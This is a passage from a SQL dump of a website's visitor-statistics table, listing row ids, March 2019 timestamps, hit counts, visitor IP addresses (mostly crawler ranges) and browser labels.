,1,0,0,'92.113.62.114','chrome'),(396137,1551944905,1,1,0,0,'46.229.168.136','other'),(396138,1551945062,1,1,0,0,'54.36.148.125','other'),(396139,1551945361,1,1,0,0,'66.249.64.218','chrome'),(396140,1551945468,1,1,0,0,'91.196.177.46','firefox'),(396141,1551946136,2,2,0,0,'216.244.66.241','other'),(396142,1551946323,1,1,0,0,'95.134.195.142','chrome'),(396143,1551946703,1,1,0,0,'54.36.150.99','other'),(396145,1551946887,1,1,0,0,'91.196.177.15','chrome'),(396146,1551947274,1,1,0,0,'157.55.39.227','other'),(396147,1551947380,3,3,0,0,'216.244.66.241','other'),(396148,1551947503,1,1,0,0,'191.101.215.23','chrome'),(396149,1551948349,1,1,0,0,'31.43.34.227','chrome'),(396150,1551948374,1,1,0,0,'5.45.207.19','other'),(396151,1551948677,1,1,0,0,'207.46.13.172','other'),(396152,1551948920,1,1,0,0,'54.36.148.34','other'),(396153,1551949025,4,4,0,0,'216.244.66.241','other'),(396154,1551949770,1,1,0,0,'66.249.64.218','chrome'),(396155,1551949806,1,1,0,0,'54.36.148.67','other'),(396156,1551949951,1,1,0,0,'66.249.64.222','chrome'),(396157,1551950089,1,1,0,0,'46.229.168.154','other'),(396158,1551950621,1,1,0,0,'54.36.148.39','other'),(396159,1551950739,1,1,0,0,'54.36.150.84','other'),(396160,1551950764,1,1,0,0,'95.132.43.249','firefox'),(396161,1551950822,1,1,0,0,'54.36.150.184','other'),(396162,1551950848,1,1,0,0,'46.229.168.135','other'),(396163,1551950852,1,1,0,0,'95.163.255.47','other'),(396164,1551950929,1,0,1,0,'66.249.64.220',''),(396165,1551951136,1,1,0,0,'157.55.39.117','other'),(396166,1551951230,1,1,0,0,'54.36.148.237','other'),(396167,1551951513,1,1,0,0,'46.229.168.145','other'),(396168,1551951600,1,1,0,0,'91.196.178.82','chrome'),(396169,1551951613,1,1,0,0,'157.55.39.227','other'),(396170,1551951782,1,1,0,0,'40.77.167.163','other'),(396171,1551952072,1,1,0,0,'54.36.148.147','other'),(396172,1551952193,1,1,0,0,'54.36.148.40','other'),(396173,1551952648,1,1,0,0,'54.36.149.98','other'),(396174,1551953045,1,1,0,0,'40.77.167.163','other'),(396175,1551953246,1,1,0,0,'54.36.150.167','other'),(396176,1551953349,1,1,0,0,'54.36.150.41','other'),(396177,1551953361,1,1,0,0,'176.37.192.2','chrome'),(396178,1551953417,1,1,0,0,'46.229.168.136','other'),(396179,1551953747,1,1,0,0,'95.108.213.4','other'),(396180,1551953755,1,1,0,0,'54.36.150.136','other'),(396181,1551953841,2,2,0,0,'216.244.66.241','other'),(396182,1551953924,4,4,0,0,'5.45.207.19','other'),(396183,1551954190,1,1,0,0,'95.163.255.43','other'),(396184,1551954233,1,1,0,0,'178.154.244.11','other'),(396185,1551954303,1,1,0,0,'54.36.148.47','other'),(396186,1551954434,1,1,0,0,'91.196.178.89','chrome'),(396187,1551954628,1,1,0,0,'54.36.148.65','other'),(396188,1551954675,1,1,0,0,'54.36.150.23','other'),(396189,1551954698,3,3,0,0,'95.108.213.4','other'),(396190,1551954780,1,1,0,0,'5.45.207.79','other'),(396191,1551954809,2,2,0,0,'216.244.66.241','other'),(396192,1551954916,3,3,0,0,'5.45.207.19','other'),(396193,1551954950,2,2,0,0,'8.29.198.25','other'),(396194,1551955270,1,1,0,0,'54.36.150.115','other'),(396195,1551955469,1,1,0,0,'141.8.142.103','other'),(396196,1551955489,1,1,0,0,'54.36.148.18','other'),(396197,1551955701,1,1,0,0,'46.229.168.153','other'),(396198,1551955920,1,1,0,0,'54.36.150.79','other'),(396199,1551955960,1,1,0,0,'5.45.207.79','other'),(396200,1551956015,1,1,0,0,'54.36.148.243','other'),(396201,1551956116,1,1,0,0,'91.196.178.187','chrome'),(396202,1551956144,1,1,0,0,'40.77.167.163','other'),(396203,1551957071,1,1,0,0,'216.244.66.241','other'),(396204,1551957191,1,1,0,0,'54.36.150.105','other'),(396205,1551957283,1,1,0,0,'54.36.150.104','other'),(396206,1551957366,1,1,0,0,'54.36.150.126','other'),(396207,1551957508,1,1,0,0,'54.36.150.179','other'),(396208,1551957675,1,1,0,0,'54.36.150.160','other'),(396209,1551957727,1,1,0,0,'54.36.148.142','other'),(396210,1551957914,1,1,0,0,'54.36.148.123','other'),(396211,1551957996,2,2,0,0,'66.249.64.220','chrome'),(396212,1551958089,1,1,0,0,'66.249.64.218','chrome'),(396213,1551958122,1,1,0,0,'54.36.149.39','other'),(396214,1551958461,1,1,0,0,'54.36.150.136','other'),(396215,1551958552,1,1,0,0,'54.36.150.61','other'),(396216,1551958794,1,1,0,0,'176.9.9.94','other'),(396217,1551958891,1,1,0,0,'46.229.168.138','other'),(396218,1551959005,1,1,0,0,'46.229.168.147','other'),(396219,1551959115,1,1,0,0,'54.36.148.64','other'),(396220,1551959145,1,1,0,0,'51.255.65.46','other'),(396221,1551959710,1,1,0,0,'157.55.39.195','other'),(396222,1551960238,2,2,0,0,'216.244.66.241','other'),(396223,1551960341,1,1,0,0,'46.229.168.154','other'),(396224,1551960674,1,1,0,0,'40.77.167.99','other'),(396225,1551960690,2,2,0,0,'40.77.167.144','other'),(396226,1551960826,1,1,0,0,'40.77.167.202','other'),(396227,1551960829,1,1,0,0,'40.77.167.183','other'),(396228,1551961115,1,1,0,0,'66.249.64.222','chrome'),(396229,1551961228,1,1,0,0,'46.229.168.150','other'),(396230,1551961344,1,1,0,0,'46.229.168.139','other'),(396231,1551961462,1,1,0,0,'54.36.148.163','other'),(396232,1551961746,1,1,0,0,'66.249.64.58','chrome'),(396233,1551961776,1,1,0,0,'54.36.150.121','other'),(396234,1551962051,2,2,0,0,'40.77.167.144','other'),(396235,1551962057,2,2,0,0,'216.244.66.241','other'),(396236,1551962121,1,1,0,0,'66.249.64.218','chrome'),(396237,1551962236,1,1,0,0,'54.36.150.28','other'),(396238,1551962401,1,1,0,0,'54.36.150.105','other'),(396239,1551962453,1,1,0,0,'46.229.168.144','other'),(396240,1551963053,1,1,0,0,'66.249.64.220','chrome'),(396241,1551963122,1,1,0,0,'46.229.168.153','other'),(396242,1551963748,1,1,0,0,'40.77.167.144','other'),(396243,1551963840,1,1,0,0,'54.36.150.154','other'),(396244,1551963869,1,1,0,0,'207.46.13.219','other'),(396245,1551964075,1,1,0,0,'46.229.168.150','other'),(396246,1551964169,2,2,0,0,'216.244.66.241','other'),(396247,1551964277,1,1,0,0,'54.36.149.95','other'),(396248,1551964425,1,1,0,0,'207.46.13.252','other'),(396249,1551964430,1,1,0,0,'40.77.167.213','other'),(396250,1551964588,1,1,0,0,'40.77.167.49','other'),(396251,1551964984,1,1,0,0,'66.249.64.62','chrome'),(396252,1551965201,1,1,0,0,'66.249.64.220','chrome'),(396253,1551965411,1,1,0,0,'54.36.150.112','other'),(396254,1551965858,2,2,0,0,'8.29.198.26','other'),(396255,1551965930,1,1,0,0,'54.36.148.2','other'),(396256,1551966151,1,1,0,0,'54.36.149.27','other'),(396257,1551966182,1,1,0,0,'5.153.178.105','chrome'),(396258,1551966377,1,1,0,0,'54.36.150.117','other'),(396259,1551966489,1,1,0,0,'40.77.167.49','other'),(396260,1551966913,1,1,0,0,'46.229.168.141','other'),(396261,1551967041,1,1,0,0,'66.249.64.222','chrome'),(396262,1551967437,1,1,0,0,'54.36.150.141','other'),(396263,1551967463,1,1,0,0,'54.36.150.187','other'),(396264,1551967472,1,1,0,0,'46.229.168.135','other'),(396265,1551967698,1,1,0,0,'54.36.148.223','other'),(396266,1551967844,1,1,0,0,'207.46.13.36','other'),(396267,1551967956,1,1,0,0,'157.55.39.100','other'),(396268,1551968136,1,1,0,0,'37.235.131.131','chrome'),(396269,1551968207,1,1,0,0,'46.229.168.153','other'),(396270,1551968342,1,1,0,0,'54.36.148.25','other'),(396271,1551968688,1,1,0,0,'66.249.64.218','chrome'),(396272,1551969166,1,1,0,0,'54.36.149.54','other'),(396273,1551969239,1,1,0,0,'54.36.149.70','other'),(396274,1551969270,1,1,0,0,'157.55.39.100','other'),(396275,1551969402,1,1,0,0,'54.36.150.30','other'),(396276,1551970714,2,2,0,0,'5.45.207.79','other'),(396277,1551970767,1,1,0,0,'54.36.148.8','other'),(396278,1551970929,1,1,0,0,'54.36.148.129','other'),(396279,1551971043,2,2,0,0,'5.45.207.19','other'),(396280,1551971051,1,1,0,0,'180.76.15.32','other'),(396281,1551971137,1,1,0,0,'54.36.148.55','other'),(396282,1551971198,1,1,0,0,'54.36.149.52','other'),(396283,1551971231,3,3,0,0,'141.8.142.103','other'),(396284,1551971327,1,1,0,0,'178.154.244.11','other'),(396285,1551971379,1,1,0,0,'54.36.149.54','other'),(396286,1551971505,1,1,0,0,'54.36.150.22','other'),(396287,1551971742,2,2,0,0,'5.45.207.79','other'),(396288,1551972172,1,1,0,0,'87.250.224.47','other'),(396289,1551972173,2,2,0,0,'5.45.207.19','other'),(396290,1551972675,1,1,0,0,'46.229.168.143','other'),(396291,1551972727,1,1,0,0,'5.45.207.79','other'),(396292,1551972910,1,1,0,0,'178.154.244.11','other'),(396293,1551973494,1,1,0,0,'54.36.149.69','other'),(396294,1551973577,1,1,0,0,'54.36.149.48','other'),(396295,1551973926,1,1,0,0,'54.36.148.55','other'),(396296,1551973988,1,1,0,0,'46.229.168.134','other'),(396297,1551974145,1,1,0,0,'54.36.149.96','other'),(396298,1551974552,1,1,0,0,'66.249.64.220','chrome'),(396299,1551974699,1,1,0,0,'46.229.168.139','other'),(396300,1551974740,1,1,0,0,'54.36.150.119','other'),(396301,1551974925,1,1,0,0,'46.229.168.147','other'),(396302,1551974988,1,1,0,0,'46.229.168.144','other'),(396303,1551975114,1,1,0,0,'54.36.150.155','other'),(396304,1551975196,2,2,0,0,'216.244.66.241','other'),(396305,1551975311,1,1,0,0,'54.36.150.129','other'),(396306,1551975577,1,1,0,0,'46.229.168.150','other'),(396307,1551976092,1,1,0,0,'207.46.13.47','other'),(396308,1551976303,1,1,0,0,'66.249.64.222','chrome'),(396309,1551976486,9,9,0,0,'176.37.80.245','other'),(396310,1551976586,1,1,0,0,'66.249.64.218','chrome'),(396311,1551976722,1,1,0,0,'8.29.198.25','other'),(396312,1551976801,1,1,0,0,'8.29.198.26','other'),(396313,1551977119,2,2,0,0,'216.244.66.241','other'),(396314,1551977342,1,1,0,0,'5.45.207.79','other'),(396315,1551977361,1,1,0,0,'85.232.147.155','chrome'),(396316,1551977525,1,1,0,0,'54.36.150.89','other'),(396317,1551977557,1,1,0,0,'54.36.149.32','other'),(396318,1551977741,1,1,0,0,'46.229.168.138','other'),(396319,1551978020,1,1,0,0,'216.244.66.241','other'),(396320,1551978313,1,1,0,0,'66.249.64.220','chrome'),(396321,1551978546,1,1,0,0,'46.229.168.140','other'),(396322,1551978558,1,1,0,0,'46.211.114.152','chrome'),(396323,1551978797,1,1,0,0,'54.36.150.139','other'),(396324,1551978912,1,1,0,0,'54.36.150.120','other'),(396325,1551979008,1,1,0,0,'46.229.168.147','other'),(396326,1551979014,1,1,0,0,'54.36.149.92','other'),(396327,1551979100,1,1,0,0,'178.154.244.11','other'),(396328,1551979449,1,1,0,0,'46.229.168.129','other'),(396329,1551979656,1,1,0,0,'54.36.148.0','other'),(396330,1551979878,1,1,0,0,'95.163.255.44','other'),(396331,1551979893,1,1,0,0,'54.36.148.249','other'),(396332,1551980170,2,2,0,0,'157.55.39.55','other'),(396333,1551980222,3,3,0,0,'5.45.207.19','other'),(396334,1551980363,2,2,0,0,'216.244.66.241','other'),(396335,1551980436,1,1,0,0,'46.211.114.152','chrome'),(396336,1551980449,1,1,0,0,'46.229.168.143','other'),(396337,1551980513,1,1,0,0,'66.249.64.222','chrome'),(396338,1551980525,1,1,0,0,'66.249.64.58','chrome'),(396339,1551980536,1,1,0,0,'66.249.64.218','chrome'),(396340,1551980681,1,1,0,0,'207.46.13.85','other'),(396341,1551980775,1,1,0,0,'66.249.64.62','chrome'),(396342,1551981346,1,1,0,0,'157.55.39.55','other'),(396343,1551981352,1,1,0,0,'157.55.39.103','other'),(396344,1551981406,1,1,0,0,'54.36.150.115','other'),(396345,1551981923,1,1,0,0,'54.36.148.156','other'),(396346,1551982103,1,1,0,0,'157.55.39.100','other'),(396347,1551982545,1,1,0,0,'54.36.148.51','other'),(396348,1551982610,1,1,0,0,'54.36.150.168','other'),(396349,1551982701,2,2,0,0,'207.46.13.102','other'),(396350,1551982793,1,1,0,0,'54.36.148.218','other'),(396351,1551982880,1,1,0,0,'54.36.148.127','other'),(396352,1551983079,3,3,0,0,'216.244.66.241','other'),(396353,1551983120,2,2,0,0,'78.46.63.108','other'),(396354,1551983195,1,1,0,0,'66.249.64.193','chrome'),(396355,1551983415,1,1,0,0,'54.36.150.125','other'),(396356,1551983505,34,34,0,0,'173.212.247.190','other'),(396357,1551984131,1,1,0,0,'66.249.64.222','chrome'),(396358,1551984349,1,1,0,0,'54.36.148.33','other'),(396359,1551984755,1,1,0,0,'54.36.150.121','other'),(396360,1551984782,1,1,0,0,'46.229.168.132','other'),(396361,1551985080,1,1,0,0,'207.46.13.85','other'),(396362,1551985322,1,1,0,0,'66.249.64.222','chrome'),(396363,1551985349,1,1,0,0,'54.36.149.104','other'),(396364,1551985370,1,1,0,0,'46.229.168.143','other'),(396365,1551985417,1,1,0,0,'54.36.148.179','other'),(396366,1551985427,1,1,0,0,'54.36.149.3','other'),(396367,1551985436,1,1,0,0,'207.46.13.102','other'),(396368,1551985470,1,1,0,0,'54.36.148.192','other'),(396369,1551986052,1,1,0,0,'209.17.97.34','other'),(396370,1551986323,1,1,0,0,'54.36.148.243','other'),(396371,1551987587,2,2,0,0,'8.29.198.27','other'),(396372,1551988163,1,1,0,0,'54.36.148.242','other'),(396373,1551988293,1,1,0,0,'46.211.53.102','chrome'),(396374,1551988434,1,1,0,0,'54.36.150.135','other'),(396375,1551988792,1,1,0,0,'54.36.148.80','other'),(396376,1551988898,1,1,0,0,'95.108.181.54','other'),(396377,1551988948,1,1,0,0,'54.36.148.255','other'),(396378,1551988998,1,1,0,0,'5.45.207.79','other'),(396379,1551989049,2,2,0,0,'37.9.113.148','other'),(396380,1551989138,1,1,0,0,'54.36.149.36','other'),(396381,1551989244,1,1,0,0,'91.196.178.100','chrome'),(396382,1551989345,1,1,0,0,'141.8.142.103','other'),(396383,1551989495,1,1,0,0,'95.163.255.43','other'),(396384,1551989637,2,2,0,0,'157.55.39.55','other'),(396385,1551989696,1,1,0,0,'54.36.149.91','other'),(396386,1551989870,1,1,0,0,'46.229.168.133','other'),(396387,1551989997,1,1,0,0,'54.36.148.47','other'),(396388,1551990206,1,1,0,0,'178.154.244.65','other'),(396389,1551990215,1,1,0,0,'95.163.255.42','other'),(396390,1551990293,3,3,0,0,'5.45.207.79','other'),(396391,1551990346,1,1,0,0,'95.108.213.4','other'),(396392,1551990388,1,1,0,0,'54.36.148.54','other'),(396393,1551990455,1,1,0,0,'157.55.39.100','other'),(396394,1551990501,1,1,0,0,'54.36.150.184','other'),(396395,1551990510,1,1,0,0,'54.36.150.38','other'),(396396,1551990595,1,1,0,0,'54.36.149.6','other'),(396397,1551990676,2,2,0,0,'178.154.244.11','other'),(396398,1551990693,1,1,0,0,'216.244.66.241','other'),(396399,1551990789,1,1,0,0,'54.36.148.205','other'),(396400,1551990964,2,2,0,0,'5.45.207.19','other'),(396401,1551991051,1,1,0,0,'46.229.168.136','other'),(396402,1551991595,1,1,0,0,'54.36.148.32','other'),(396403,1551992039,1,1,0,0,'54.36.148.220','other'),(396404,1551992288,2,2,0,0,'157.55.39.100','other'),(396405,1551992613,1,1,0,0,'54.36.148.166','other'),(396406,1551992735,1,1,0,0,'54.36.150.143','other'),(396407,1551992862,1,1,0,0,'82.145.211.87','other'),(396408,1551993603,1,1,0,0,'216.244.66.241','other'),(396409,1551993680,1,1,0,0,'54.36.149.64','other'),(396410,1551993960,1,1,0,0,'54.36.148.109','other'),(396411,1551994209,1,1,0,0,'194.68.225.11','chrome'),(396412,1551994253,1,1,0,0,'54.36.150.55','other'),(396413,1551994284,1,1,0,0,'54.36.150.92','other'),(396414,1551994497,1,1,0,0,'54.36.148.234','other'),(396415,1551994715,1,1,0,0,'54.36.150.160','other'),(396416,1551994751,1,1,0,0,'95.163.255.48','other'),(396417,1551994866,1,1,0,0,'66.249.64.220','chrome'),(396418,1551995103,1,1,0,0,'46.229.168.129','other'),(396419,1551995567,1,1,0,0,'37.204.188.209','msie'),(396420,1551995659,1,1,0,0,'95.163.255.46','other'),(396421,1551995749,1,1,0,0,'54.36.148.107','other'),(396422,1551996106,1,1,0,0,'54.36.148.102','other'),(396423,1551996129,1,1,0,0,'157.55.39.100','other'),(396424,1551996152,1,1,0,0,'82.145.211.129','other'),(396425,1551996226,1,1,0,0,'207.46.13.102','other'),(396426,1551996253,1,1,0,0,'46.229.168.142','other'),(396427,1551996335,1,1,0,0,'54.36.148.251','other'),(396428,1551996448,1,1,0,0,'95.163.255.49','other'),(396429,1551996755,1,1,0,0,'54.36.150.183','other'),(396430,1551997023,1,1,0,0,'54.36.148.55','other'),(396431,1551997422,1,1,0,0,'46.229.168.136','other'),(396432,1551997637,1,1,0,0,'157.55.39.55','other'),(396433,1551998365,1,1,0,0,'66.249.64.196','chrome'),(396434,1551998452,1,1,0,0,'8.29.198.25','other'),(396435,1551998519,1,1,0,0,'8.29.198.27','other'),(396436,1551998594,1,1,0,0,'54.36.150.150','other'),(396437,1551998652,1,1,0,0,'157.55.39.100','other'),(396438,1551998896,1,1,0,0,'207.46.13.85','other'),(396439,1551999009,1,1,0,0,'216.244.66.241','other'),(396440,1551999219,1,1,0,0,'46.229.168.152','other'),(396441,1551999560,1,1,0,0,'54.36.150.31','other'),(396442,1551999571,1,1,0,0,'54.36.149.46','other'),(396443,1551999642,1,1,0,0,'157.55.39.100','other'),(396444,1551999819,1,1,0,0,'66.249.64.62','chrome'),(396445,1551999924,1,1,0,0,'46.229.168.143','other'),(396446,1552000210,1,1,0,0,'54.36.148.31','other'),(396447,1552000415,1,1,0,0,'40.77.167.63','other'),(396448,1552000994,1,1,0,0,'95.132.36.228','other'),(396449,1552001000,1,1,0,0,'54.36.150.30','other'),(396450,1552001058,1,1,0,0,'54.36.149.95','other'),(396451,1552001658,1,1,0,0,'216.244.66.241','other'),(396452,1552001755,1,1,0,0,'207.46.13.85','other'),(396453,1552001915,1,1,0,0,'54.36.150.33','other'),(396454,1552002668,1,1,0,0,'54.36.148.119','other'),(396455,1552002764,1,1,0,0,'54.36.150.175','other'),(396456,1552002856,1,1,0,0,'54.36.148.199','other'),(396457,1552002869,1,1,0,0,'216.244.66.241','other'),(396458,1552003153,1,1,0,0,'54.36.148.200','other'),(396459,1552003164,1,1,0,0,'54.36.148.248','other'),(396460,1552003429,2,2,0,0,'207.46.13.252','other'),(396461,1552003432,1,1,0,0,'40.77.167.192','other'),(396462,1552003788,1,1,0,0,'216.244.66.241','other'),(396463,1552003971,1,1,0,0,'157.55.39.55','other'),(396464,1552004331,1,1,0,0,'46.229.168.153','other'),(396465,1552004689,1,1,0,0,'46.229.168.151','other'),(396466,1552004842,1,1,0,0,'157.55.39.252','other'),(396467,1552004895,1,1,0,0,'54.36.149.45','other'),(396468,1552005013,1,1,0,0,'54.36.150.60','other'),(396469,1552005316,4,4,0,0,'5.45.207.79','other'),(396470,1552005375,1,1,0,0,'95.108.213.4','other'),(396471,1552005394,1,1,0,0,'46.229.168.144','other'),(396472,1552005398,2,2,0,0,'178.154.244.11','other'),(396473,1552005414,1,1,0,0,'141.8.142.103','other'),(396474,1552005712,1,1,0,0,'5.255.253.38','other'),(396475,1552005766,1,1,0,0,'54.36.148.49','other'),(396476,1552005871,1,1,0,0,'54.36.149.53','other'),(396477,1552005885,1,1,0,0,'46.229.168.148','other'),(396478,1552005896,1,1,0,0,'54.36.149.87','other'),(396479,1552006275,1,1,0,0,'37.9.113.148','other'),(396480,1552006531,1,1,0,0,'141.8.142.103','other'),(396481,1552006534,1,1,0,0,'141.8.183.22','other'),(396482,1552006579,1,1,0,0,'95.108.181.54','other'),(396483,1552006594,1,1,0,0,'216.244.66.241','other'),(396484,1552006633,1,1,0,0,'95.108.181.75','other'),(396485,1552006652,1,1,0,0,'141.8.142.38','other'),(396486,1552006759,1,1,0,0,'54.36.150.106','other'),(396487,1552006765,1,1,0,0,'46.229.168.129','other'),(396488,1552006816,1,1,0,0,'178.154.171.27','other'),(396489,1552006829,1,1,0,0,'178.154.200.48','other'),(396490,1552006903,1,1,0,0,'87.250.224.65','other'),(396491,1552007033,2,2,0,0,'207.46.13.230','other'),(396492,1552007037,1,1,0,0,'40.77.167.192','other'),(396493,1552007320,1,1,0,0,'46.229.168.142','other'),(396494,1552007449,1,1,0,0,'178.154.244.11','other'),(396495,1552007524,1,1,0,0,'54.36.148.143','other'),(396496,1552007584,1,1,0,0,'180.76.15.6','other'),(396497,1552007704,1,1,0,0,'54.36.149.2','other'),(396498,1552007748,1,1,0,0,'46.229.168.145','other'),(396499,1552008109,1,0,1,0,'66.249.64.220',''),(396500,1552008239,1,1,0,0,'54.36.150.175','other'),(396501,1552008263,2,2,0,0,'157.55.39.252','other'),(396502,1552008632,1,1,0,0,'141.8.142.103','other'),(396503,1552008939,1,1,0,0,'46.229.168.133','other'),(396504,1552009083,1,1,0,0,'54.36.150.95','other'),(396505,1552009337,2,2,0,0,'8.29.198.25','other'),(396506,1552009358,1,1,0,0,'54.36.149.78','other'),(396507,1552009771,1,1,0,0,'54.36.149.22','other'),(396508,1552009856,1,1,0,0,'54.36.150.107','other'),(396509,1552010117,1,1,0,0,'54.36.150.56','other'),(396510,1552010342,1,1,0,0,'54.36.149.96','other'),(396511,1552010550,1,1,0,0,'54.36.150.180','other'),(396512,1552010651,1,1,0,0,'207.46.13.240','other'),(396513,1552010656,2,2,0,0,'40.77.167.193','other'),(396514,1552010924,1,1,0,0,'54.36.148.192','other'),(396515,1552010948,1,1,0,0,'54.36.150.43','other'),(396516,1552011152,1,1,0,0,'54.36.150.25','other'),(396517,1552011337,2,2,0,0,'216.244.66.241','other'),(396518,1552011989,2,2,0,0,'34.211.43.195','chrome'),(396519,1552012258,1,1,0,0,'95.163.255.47','other'),(396520,1552012507,1,1,0,0,'180.76.15.24','other'),(396521,1552012682,1,1,0,0,'54.36.148.149','other'),(396522,1552012686,1,1,0,0,'54.36.150.120','other'),(396523,1552012878,1,1,0,0,'46.229.168.139','other'),(396524,1552013051,1,1,0,0,'54.36.150.118','other'),(396525,1552013483,1,1,0,0,'54.36.148.89','other'),(396526,1552013498,1,1,0,0,'54.36.148.132','other'),(396527,1552013756,1,1,0,0,'157.55.39.100','other'),(396528,1552013932,1,1,0,0,'54.36.148.133','other'),(396529,1552014126,2,2,0,0,'216.244.66.241','other'),(396530,1552014720,1,1,0,0,'157.55.39.252','other'),(396531,1552014791,1,1,0,0,'46.229.168.136','other'),(396532,1552015170,1,1,0,0,'207.46.13.101','other'),(396533,1552015419,1,1,0,0,'54.36.148.179','other'),(396534,1552015551,1,1,0,0,'54.36.148.85','other'),(396535,1552015756,1,1,0,0,'54.36.148.174','other'),(396536,1552015819,1,1,0,0,'46.229.168.137','other'),(396537,1552016109,1,1,0,0,'46.229.168.140','other'),(396538,1552016120,1,1,0,0,'66.249.64.222','chrome'),(396539,1552016401,1,1,0,0,'54.36.150.124','other'),(396540,1552016825,1,1,0,0,'207.46.13.53','other'),(396541,1552017096,1,1,0,0,'95.163.255.49','other'),(396542,1552017435,1,1,0,0,'54.36.148.255','other'),(396543,1552018435,1,1,0,0,'54.36.148.80','other'),(396544,1552018589,1,1,0,0,'95.163.255.45','other'),(396545,1552018747,1,1,0,0,'216.244.66.241','other'),(396546,1552019017,1,1,0,0,'66.249.64.218','chrome'),(396547,1552019449,1,1,0,0,'207.46.13.240','other'),(396548,1552019454,1,1,0,0,'40.77.167.192','other'),(396549,1552019479,1,1,0,0,'46.229.168.139','other'),(396550,1552019724,1,1,0,0,'54.36.150.38','other'),(396551,1552019882,1,1,0,0,'157.55.39.252','other'),(396552,1552020196,1,1,0,0,'8.29.198.27','other'),(396553,1552020256,1,1,0,0,'8.29.198.26','other'),(396554,1552020413,1,1,0,0,'54.36.148.251','other'),(396555,1552020513,1,1,0,0,'157.55.39.55','other'),(396556,1552020954,1,1,0,0,'40.77.167.207','other'),(396557,1552020968,1,1,0,0,'54.36.148.2','other'),(396558,1552021016,1,1,0,0,'66.249.64.218','chrome'),(396559,1552021084,1,1,0,0,'54.36.150.29','other'),(396560,1552021118,1,1,0,0,'46.229.168.148','other'),(396561,1552021197,1,1,0,0,'207.46.13.101','other'),(396562,1552021464,1,1,0,0,'46.229.168.150','other'),(396563,1552021540,3,3,0,0,'216.244.66.241','other'),(396564,1552021602,1,1,0,0,'54.36.149.21','other'),(396565,1552021913,1,1,0,0,'176.9.9.94','other'),(396566,1552022102,1,1,0,0,'46.229.168.129','other'),(396567,1552022183,1,1,0,0,'54.36.148.198','other'),(396568,1552022403,1,1,0,0,'54.36.149.7','other'),(396569,1552022576,1,1,0,0,'46.229.168.134','other'),(396570,1552022608,1,1,0,0,'54.36.149.58','other'),(396571,1552022718,2,2,0,0,'87.250.224.47','other'),(396572,1552022748,3,3,0,0,'5.45.207.19','other'),(396573,1552022855,2,2,0,0,'178.154.244.11','other'),(396574,1552023052,1,1,0,0,'46.229.168.139','other'),(396575,1552023061,1,1,0,0,'207.46.13.240','other'),(396576,1552023065,1,1,0,0,'207.46.13.230','other'),(396577,1552023105,1,1,0,0,'95.108.213.4','other'),(396578,1552023179,1,1,0,0,'54.36.150.189','other'),(396579,1552023738,1,1,0,0,'46.229.168.136','other'),(396580,1552023991,1,1,0,0,'37.115.186.35','chrome'),(396581,1552024137,1,1,0,0,'54.36.149.66','other'),(396582,1552024191,1,1,0,0,'46.229.168.149','other'),(396583,1552024218,2,2,0,0,'216.244.66.241','other'),(396584,1552024407,1,1,0,0,'46.229.168.137','other'),(396585,1552024551,1,1,0,0,'54.36.150.83','other'),(396586,1552024566,1,1,0,0,'40.77.167.207','other'),(396587,1552024831,1,1,0,0,'46.229.168.132','other'),(396588,1552024850,1,1,0,0,'54.36.148.33','other'),(396589,1552024889,1,1,0,0,'91.196.178.135','firefox'),(396590,1552025528,1,1,0,0,'66.249.64.222','chrome'),(396591,1552025861,1,1,0,0,'207.46.13.101','other'),(396592,1552026034,1,1,0,0,'46.229.168.132','other'),(396593,1552026149,1,1,0,0,'54.36.148.254','other'),(396594,1552026339,1,1,0,0,'185.107.83.71','other'),(396595,1552026495,1,1,0,0,'54.36.148.229','other'),(396596,1552026694,1,1,0,0,'40.77.167.200','other'),(396597,1552026699,1,1,0,0,'207.46.13.230','other'),(396598,1552027636,1,1,0,0,'54.36.148.180','other'),(396599,1552027642,1,1,0,0,'46.229.168.142','other'),(396600,1552027915,1,1,0,0,'66.249.64.222','chrome'),(396601,1552028093,1,1,0,0,'54.36.149.36','other'),(396602,1552028095,1,1,0,0,'54.36.150.55','other'),(396603,1552028131,1,1,0,0,'46.229.168.130','other'),(396604,1552028202,1,1,0,0,'40.77.167.207','other'),(396605,1552028343,1,1,0,0,'95.163.255.102','other'),(396606,1552029329,1,1,0,0,'46.229.168.141','other'),(396607,1552029478,1,1,0,0,'54.36.148.23','other'),(396608,1552029480,1,1,0,0,'40.77.167.211','other'),(396609,1552029670,3,3,0,0,'216.244.66.241','other'),(396610,1552030028,1,1,0,0,'178.154.244.11','other'),(396611,1552030177,1,1,0,0,'54.36.148.68','other'),(396612,1552030574,1,1,0,0,'54.36.149.12','other'),(396613,1552031062,1,1,0,0,'8.29.198.25','other'),(396614,1552031115,1,1,0,0,'46.229.168.140','other'),(396615,1552031140,1,1,0,0,'8.29.198.27','other'),(396616,1552031257,1,1,0,0,'54.36.150.69','other'),(396617,1552031329,1,1,0,0,'46.229.168.149','other'),(396618,1552031513,1,1,0,0,'54.36.148.88','other'),(396619,1552031635,1,1,0,0,'54.36.150.120','other'),(396620,1552032428,1,1,0,0,'46.229.168.134','other'),(396621,1552032709,1,1,0,0,'216.244.66.241','other'),(396622,1552033267,1,1,0,0,'46.229.168.130','other'),(396623,1552033585,1,1,0,0,'54.36.150.26','other'),(396624,1552033767,1,1,0,0,'66.249.64.218','chrome'),(396625,1552034053,2,2,0,0,'176.9.9.94','other'),(396626,1552034114,1,1,0,0,'54.36.150.8','other'),(396627,1552034133,1,1,0,0,'54.36.149.17','other'),(396628,1552034418,1,1,0,0,'5.188.210.65','chrome'),(396629,1552034419,1,1,0,0,'5.188.210.53','chrome'),(396630,1552034425,1,1,0,0,'95.163.255.48','other'),(396631,1552034574,1,1,0,0,'176.113.170.104','chrome'),(396632,1552034877,1,1,0,0,'46.229.168.141','other'),(396633,1552035111,1,1,0,0,'54.36.150.113','other'),(396634,1552035385,1,1,0,0,'54.36.150.133','other'),(396635,1552035530,1,1,0,0,'54.36.149.38','other'),(396636,1552035680,1,1,0,0,'54.36.148.199','other'),(396637,1552035823,1,1,0,0,'54.36.148.247','other'),(396638,1552035965,1,1,0,0,'180.76.15.25','other'),(396639,1552036099,1,1,0,0,'185.17.127.245','chrome'),(396640,1552036232,1,1,0,0,'54.36.149.106','other'),(396641,1552037070,1,1,0,0,'54.36.148.246','other'),(396642,1552037115,1,1,0,0,'54.36.148.26','other'),(396643,1552037135,1,1,0,0,'5.228.8.18','msie'),(396644,1552037358,1,1,0,0,'66.249.64.218','chrome'),(396645,1552037465,1,1,0,0,'54.36.148.42','other'),(396646,1552037587,1,1,0,0,'216.244.66.241','other'),(396647,1552038328,1,1,0,0,'54.36.149.48','other'),(396648,1552038482,1,1,0,0,'207.46.13.106','other'),(396649,1552038526,1,1,0,0,'54.36.150.91','other'),(396650,1552038608,1,1,